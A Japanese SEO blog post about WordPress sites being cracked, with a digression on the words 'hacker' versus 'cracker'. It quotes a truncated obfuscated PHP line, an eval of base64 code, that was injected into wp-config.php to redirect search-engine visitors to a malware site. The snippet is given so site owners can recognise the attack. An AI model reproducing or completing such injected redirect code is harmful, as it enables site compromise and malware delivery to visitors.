*

定期的に自サイトが検索結果にどう表示されているか確認しよう | YMO「FIRECRACKER」

公開日: : SEO

定期的に自サイトが検索結果にどう表示されているか確認しよう | YMO「FIRECRACKER」

アイキャッチ画像には特に意味はない。
っていうかほんのちょっとだけ意味はあるのだが、まあ、ホントにどうでもいいので今回はあえてスルーする。

ロリポップでのクラッカーによる大規模クラッキングがあった。
それだけではなく、WordPressのサイトのクラッキングが相次いでいる。

早速冒頭からズレてしまうのだが、コンピューター犯罪を行うことをハッキング、そのようなことをする人をハッカーと呼ぶ風潮があるが、これに対してはイカンなあと思っている。
本来は、コンピューター犯罪は「クラッキング」、そういう行為をする人は「クラッカー」というのだ。

「ハック」(Hack)という言葉は本来卓越した技術・技能によってコンピュータを使いこなすことを指す。
「ハッカー」 (Hacker)とは、卓越した技術によって尊敬されるコンピューターのエンジニアのことだ。

しかし、技術を悪用してコンピューター犯罪を行う人を指す言葉になってしまった。

自分が達した剣の技の高みを試したくて夜な夜な辻斬りを行う人のことを、「剣豪」と呼ばれる様になってしまったような違和感である。

それと、もう一つ違和感を感じることがある。

技術が全然なくても、クラッキングツールを使ってクラッキングするだけの人もハッカーと呼ばれる。
本来はこれは「スクリプトキディ」と呼ばれるべきものだ。 
キディというのは子供というより「ガキ」で、ツールを使うしか能がないガキっていうぐらいの意味。

先ほどの「剣豪」の例で言えば、更に意味がズレてしまった感じだ。
剣の修業もしたことがない人が通り魔的に人を殺すという事件が増えて、そんな通り魔も「剣豪」って呼ばれるようになってしまったということだ。

O’Reillyのように正しく用語を広めようとしている出版社もあるが、

Googleまでが、
マルウェアとハッキングされたサイトについて
という表現を使っているのは非常に残念だ。

そんな風潮にすこーーーしでも棹さしてみたい。
是非皆さん、クラッカーとハッカーを分けるようにしてみてください。

さて、やっと本題に入る。

WordPressサイトのクラッキングが増えている。
私が最近相次いて経験した例について話をしてみるのだ。

一見普通にアクセスできる。

しかし、検索結果に表示された自サイトをクリックすると、全く違ったサイトに飛ばされてしまうというケースだ。

wp-config.phpを書き換えられてしまって、

eval(base64_decode(“DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cig・・・・以下略”));

こんな感じで書き換えられてしまったのである。
その飛び先がマルウェアの配布サイト。

WordPressの脆弱性を狙ったPHPコード不正書き換えについて

まさしくこれと同じである。
これが怖いのは、検索結果をクリックしないとわからないことだ。
(でも、要注意、自分のパソコンをクラッキングされてしまうかもしれない。)
なので、自分の管理下のサイトについては検索結果を定期的にチェックをしてやる必要があるということである。

 

関連記事

no image

GoogleとYahoo!のキーワードツールの検索数が違う理由

GoogleとYahoo!はそれぞれキーワードツールを公開している。 Google Adword

記事を読む

Googleの順位ランキングの判断は素人がやっていると思えばいい

Googleは賢くなってきているのだが、今でもまだまだ不完全である。そうしてきっと今後も改善はされ

記事を読む

SEOは気楽に考えればOK

医学書には載っていないが(実際見たわけではないので、載ってたらごめんなさい)、 「SEO病」 とい

記事を読む

SEO業者に対する眼差しが冷たいのは

私は交流会とかセミナー等に行くのが結構好きである。職掌柄、あまり社外に出ることがないので、この種の

記事を読む

検索順位が下がった時は我慢することが第一の選択肢 | 夏木マリ「絹の靴下」

検索順位が上がらない場合は、上がらない理由がなにかある。評価がその程度でしかないのには、その程度な

記事を読む

「火のないところに煙は立たない」がネットの風評被害を助長する | RCサクセション「けむり」

RCサクセションの「けむり」である。 自分が書きたかったことがそのまんま書いてあるので、結構長めに

記事を読む

これをやったから検索順位が上がった!下がった!という勘違い | どぶろっく「もしかしてだけど」

今日のアイキャッチ画像であるが、関連する懐メロの曲が思い浮かばなかったのが残念である。 ってなわけ

記事を読む

ドメイン名をキーワードとして評価することは間違いではない

ドメイン名にキーワードを入れることはスパムになるのか?あるいは、ドメイン名にキーワードを入れても順

記事を読む

no image

【超裏ワザ】誰も語らなかったSEO業者からリンクを大量に無料でもらう方法

そんな裏技が存在するのか? 実はある。 しかもどんな情報商材とかでも多分語られていない(と思う・・

記事を読む

中古ドメインに関して思うこと

今回のアイキャッチ画像は分かる人は分かるってことで、分かる人は「ああ、あれね」って思ってくれればそ

記事を読む

Message

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

arigatou-anata
広告はすべて否認をすべきか? | 山口百恵「ありがとうあなた」

被リンクのチェックはかったるい仕事である。 しかも、被リンクはウェブ

anatanara-dousuru
Googleがスマホ対応をランキング要因として重視すると発表 どう対応すべきか? | 「あなたならどうする」いしだあゆみ

Google、「スマホ対応」をランキング要因に利用することを決定。4/

alice
スマホ対応が難しい真の理由 | アリス「未青年」

「スマホ対応と安易に云う勿れ。」 もう一度云うのだ。 「ス

nichijyo
SEOはプレゼンテーションであると考えよう | 嘉門達夫「日常」

オーバーオプティマイゼーション(Over Optimization )

Visitors
ブログのタグをSEOの観点からどう扱うのが正解か | 佐野元春「SHAME-君を汚したのは誰」

「そのタグ大丈夫? Webサイトにタグを貼る前にチェックしたい2つのこ

→もっと見る

  • 順位は上げるものではなくて上がるものです
  • 2022年1月
    « 3月    
     12
    3456789
    10111213141516
    17181920212223
    24252627282930
    31  
PAGE TOP ↑